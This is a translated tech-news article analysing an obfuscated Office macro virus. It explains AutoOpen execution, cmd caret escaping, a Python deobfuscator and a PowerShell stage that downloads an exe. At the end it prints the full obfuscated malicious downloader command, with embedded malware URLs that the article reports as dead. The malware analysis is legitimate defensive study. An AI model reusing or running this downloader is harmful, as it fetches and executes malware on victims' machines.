
Example Analysis of various Code obfuscation Office Macro viruses

2025-04-02 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/02 Report--

This article explains in detail, through a worked example, how code-obfuscated Office macro viruses work. It is shared here as a reference; I hope you will have a better understanding of the topic after reading it.

Preface

To evade static detection by anti-virus software, some macro viruses obfuscate their script so that it is harder to detect, usually decrypting the obfuscated code dynamically at run time to achieve their purpose.

Analysis

Let's take a real virus as a practical example. Test environment: Win7 x64 + Office 2010; virus sample sample.doc (MD5: a564137f74ea2d65f8538faf89ef3897). A search on VirusTotal shows that it is detected by the vast majority of anti-virus engines.

Opening sample.doc in Office prompts you to enable macros (the prompt is actually a picture, placed there in case macros are disabled on the user's machine, to trick the user into enabling them and so achieve infection).

Enabling the macro shows that the AutoOpen() function runs automatically, and the VBA code is thoroughly obfuscated and hard to read.

Step through with F8 and navigate to the location where Shell invokes an external command.

Here you can see that a CMD command is called to execute a batch script string.

This code looks confusing at first glance because it is full of "^" characters. In fact this is just a trick: "^" is cmd's escape character, so a caret placed before an ordinary character is simply dropped when cmd executes the line and the carets carry no meaning of their own. (You can test this on Windows by running c^a^l^c.^e^x^e in cmd.exe, which opens the calculator calc.exe.) When I copied this script on Win10, however, it was blocked by Windows Defender, which shows that Microsoft has added rules to detect scripts like this. After removing the carets, I found that it is still a piece of code that is hard to understand. If you are interested, it is easier to read the script by cleaning it up yourself; here I will simply run it to see the effect.
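As an added example (not code from the original article), here is a small Python deobfuscator for the two tricks this script relies on: caret escaping, and the for /L loop in the full listing at the end of the article, which rebuilds a reversed string one character at a time before calling it. SAMPLE is a constructed command in the same style that resolves to the benign calc.exe test mentioned above.

```python
import re

# Constructed sample in the style of the analysed script (benign: ends in calc.exe)
SAMPLE = ('cmd /V:on /C "s^e^t k^b=e^x^e.^c^l^a^c ^l^l^e^hs^r^e^w^o^p'
          '&&f^o^r /L %X in (1^8;-1;0) d^o s^e^t J=!J!!k^b:~%X,1!'
          '&&c^a^l^l %J:~0%"')

# The reversal idiom: for /L %X in (HI;-1;LO) do set OUT=!OUT!!SRC:~%X,1!
LOOP_RE = re.compile(
    r"for\s+/L\s+%(\w+)\s+in\s*\(\s*(\d+)\s*;\s*-1\s*;\s*(\d+)\s*\)\s*do\s+"
    r"set\s+(\w+)=!\4!!(\w+):~%\1,1!", re.I)

def strip_carets(s: str) -> str:
    """Undo cmd.exe caret escaping: '^c' -> 'c', '^^' -> '^'."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1]); i += 2
        else:
            out.append(s[i]); i += 1
    return "".join(out)

def resolve_vars(cmdline: str) -> dict:
    """Collect 'set VAR=value' assignments, then emulate the reversal loop."""
    s = strip_carets(cmdline)
    env = {m.group(1): m.group(2)
           for m in re.finditer(r'\bset\s+(\w+)=(.*?)(?=&&|"$|$)', s, re.I)}
    m = LOOP_RE.search(s)
    if m:
        hi, lo = int(m.group(2)), int(m.group(3))
        src = env.get(m.group(5), "")
        # !SRC:~%X,1! yields one char per iteration (nothing if X is past the end)
        env[m.group(4)] = "".join(src[i] for i in range(hi, lo - 1, -1)
                                  if i < len(src))
    return env

def expand(s: str, env: dict) -> str:
    """Expand %VAR% and %VAR:~start% (a negative start counts from the end)."""
    def rep(m):
        v = env.get(m.group(1), "")
        return v[int(m.group(2)):] if m.group(2) is not None else v
    return re.sub(r"%(\w+)(?::~(-?\d+))?%", rep, s)

def final_command(cmdline: str) -> str:
    """Return what the trailing 'call %...%' would actually execute."""
    s = strip_carets(cmdline)
    env = resolve_vars(cmdline)
    m = re.search(r'\bcall\s+(.*?)"?$', s, re.I)
    return expand(m.group(1), env) if m else ""
```

Running final_command on a captured command line gives the de-escaped, un-reversed command that the sample hands to the next stage, which is what you want to log or match a detection rule against.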

If you paste this script into cmd, you will find that cmd starts powershell.exe to execute a piece of code.

This part is a little easier to understand: it tries to download an exe file from a URL into the Public directory, but the download fails with a size of 0 because the URL is no longer valid. (If you look carefully, you will find that it actually tries to download the exe from 5 URLs in turn.) The file is deleted afterwards.

Since this sample is now blocked and the download links are dead, it is impossible to study what the downloaded exe does. This article is shared to show that code obfuscation has become a common technique in malware. Office is widely used office software, so it is recommended that you set Office's macro security settings to disable macros, and that you do not casually open Office files from unknown sources.

The script analyzed in this article is listed below so that interested readers can study how bat scripts are obfuscated and deobfuscated.

CMd / V: ^ on / C "^ e ^ t ^ t ^ k ^ b = ^ ^} ^ ^ {hc ^ TAC ^ ^ ^; ^ k ^ a ^ b ^ ^; n ^ t ^ I ^ $m ^ et ^ I ^-e ^ k ^ ovn ^ I ^;) NTI ^ $^, KC ^ GI ^ lnw ^ D ^. Atz $^ {^ yrt{) ^ h^ frs ^ n ^ n ^ i^ KC ^ G ^ $(^ hc ^ a ^ erer ^ of ^ ^; ^ ^ e ^ x ^ e.^ ^ + YC ^ f ^ $^ ^ + c ^ I ^ bupp ^: vnee = ntI^; ^ ^ ^ 457 ^ ^ KC ^ G ^ $(^ hc ^ a ^ erer ^ of ^ ^; ^ ^ e ^ x ^ e.^ ^ + YCFC ^ $^ ^ n = ntIupb ^ ^ )^'^@^'(^t^i^l^p^S^.^'^I^3^B^k^S^S^h^6/^ur^.^5^5z^u^o^s^f^or^p//^:^p^t^t^h@^Gi^K^L^J^3^D^h^q^u/^gro^.c^e^dr^a^ka^d^ivav^iv//^:^p^t^t^h^@^f^H^T^P^O^i^7/^z^y^x^.^a^b^a^b^m^e^kr^o^g//^:^p^t^t^h^@^7^P^u^F^w^q^B^p^XV/^m^oc^.^k^p^k^a^s^p//^:p^t^t^h@^o^b2^qdn^B^p/^m^oc^.c^m^d^tc^a^p^moc//^:^p^t^t^h^'=^h^fr^$^;^tn^e^i^lC^b^e^W.^t^eN^ ^tc^e^j^bo^-^w^en^=^A^t^z^$^ ^l^l^e^hsr^ew^o^p&&^f^or /^L %^X ^in (^3^6^6^;^-^1; ^ 0) ^ d ^ o ^ e ^ t ^ Sr ^ u ^ J =! ^ Sr ^ u ^ J!! r ^ k ^ w ^ b: ~% ^ X ^ c ^ l% ^ x = ^ 0c ^ a ^ l% ^ Sr ^ u ^ J: ^ ~ ^ 6% "

This is the end of the example analysis of various code-obfuscated Office macro viruses. I hope the above content is helpful and that you have learned something from it. If you think the article is good, please share it so that more people can see it.
